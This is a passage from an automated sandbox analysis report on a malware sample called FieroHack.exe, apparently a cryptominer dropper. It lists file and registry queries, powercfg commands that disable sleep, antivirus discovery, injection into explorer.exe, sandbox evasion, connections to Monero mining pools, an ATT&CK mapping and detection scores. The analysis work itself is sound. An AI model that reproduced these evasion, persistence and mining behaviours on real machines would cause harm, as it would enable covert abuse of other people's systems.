      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\AppData\Roaming\Sirus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Modifies power options to not sleep / hibernate
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Abuse Elevation Control Mechanism      		11
      Disable or Modify Tools      		11
      Input Capture      		2
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Service Execution      		11
      Windows Service      		1
      DLL Side-Loading      		1
      Abuse Elevation Control Mechanism      		LSASS Memory25
      System Information Discovery      		Remote Desktop Protocol11
      Input Capture      		1
      Non-Standard Port      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Access Token Manipulation      		2
      Obfuscated Files or Information      		Security Account Manager561
      Security Software Discovery      		SMB/Windows Admin Shares1
      Clipboard Data      		1
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
      Windows Service      		1
      DLL Side-Loading      		NTDS2
      Process Discovery      		Distributed Component Object ModelInput Capture1
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script412
      Process Injection      		1
      File Deletion      		LSA Secrets371
      Virtualization/Sandbox Evasion      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
      Masquerading      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items371
      Virtualization/Sandbox Evasion      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Access Token Manipulation      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
      Process Injection      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1464754 Sample: FieroHack.exe Startdate: 30/06/2024 Architecture: WINDOWS Score: 100 78 pool.supportxmr.com 2->78 80 pool-fr.supportxmr.com 2->80 86 Snort IDS alert for network traffic 2->86 88 Multi AV Scanner detection for domain / URL 2->88 90 Antivirus / Scanner detection for submitted sample 2->90 92 6 other signatures 2->92 9 FieroHack.exe 9 2->9         started        13 leirdnhqqedj.exe 2->13         started        15 svchost.exe 2->15         started        18 svchost.exe 2->18         started        signatures3 process4 dnsIp5 74 C:\Users\user\AppData\Roaming\WeMod.exe, PE32+ 9->74 dropped 112 Drops large PE files 9->112 20 WeMod.exe 1 5 9->20         started        24 Sirus.exe 4 9->24         started        76 C:\Windows\Temp\qkrjwvgkutvb.sys, PE32+ 13->76 dropped 114 Query firmware table information (likely to detect VMs) 13->114 116 Creates files in the system32 config directory 13->116 118 Injects code into the Windows Explorer (explorer.exe) 13->118 120 6 other signatures 13->120 26 explorer.exe 13->26         started        29 powershell.exe 13->29         started        31 cmd.exe 13->31         started        33 10 other processes 13->33 84 127.0.0.1 unknown unknown 15->84 file6 signatures7 process8 dnsIp9 72 C:\ProgramData\...\leirdnhqqedj.exe, PE32+ 20->72 dropped 96 Query firmware table information (likely to detect VMs) 20->96 98 Tries to detect sandboxes and other dynamic analysis tools (window names) 20->98 100 Uses powercfg.exe to modify the power settings 20->100 110 6 other signatures 20->110 35 powershell.exe 23 20->35         started        38 cmd.exe 1 20->38         started        40 cmd.exe 20->40         started        50 13 other processes 20->50 102 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 24->102 42 conhost.exe 24->42         started        82 141.94.96.144, 49742, 9000 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 26->82 104 System process connects to network (likely due to code injection or exploit) 26->104 106 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 26->106 108 Loading BitLocker PowerShell Module 29->108 44 conhost.exe 29->44         started        46 conhost.exe 31->46         started        48 wusa.exe 31->48         started        52 9 other processes 33->52 file10 signatures11 process12 signatures13 94 Loading BitLocker PowerShell Module 35->94 54 conhost.exe 35->54         started        56 conhost.exe 38->56         started        58 wusa.exe 38->58         started        60 conhost.exe 40->60         started        62 choice.exe 40->62         started        64 conhost.exe 50->64         started        66 conhost.exe 50->66         started        68 conhost.exe 50->68         started        70 10 other processes 50->70 process14

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      FieroHack.exe49%ReversingLabsWin32.Trojan.Generic
      FieroHack.exe46%VirustotalBrowse
      FieroHack.exe100%AviraHEUR/AGEN.1338660

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      pool-fr.supportxmr.com4%VirustotalBrowse
      pool.supportxmr.com9%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
      http://www.fontbureau.com0%URL Reputationsafe
      http://www.fontbureau.com0%URL Reputationsafe
      http://www.fontbureau.com/designersG0%URL Reputationsafe
      https://api.ip.sb/ip0%URL Reputationsafe
      https://sectigo.com/CPS00%URL Reputationsafe
      http://www.fontbureau.com/designers/?0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://ocsp.sectigo.com00%URL Reputationsafe
      http://ocsp.sectigo.com00%URL Reputationsafe
      http://www.fontbureau.com/designers?0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
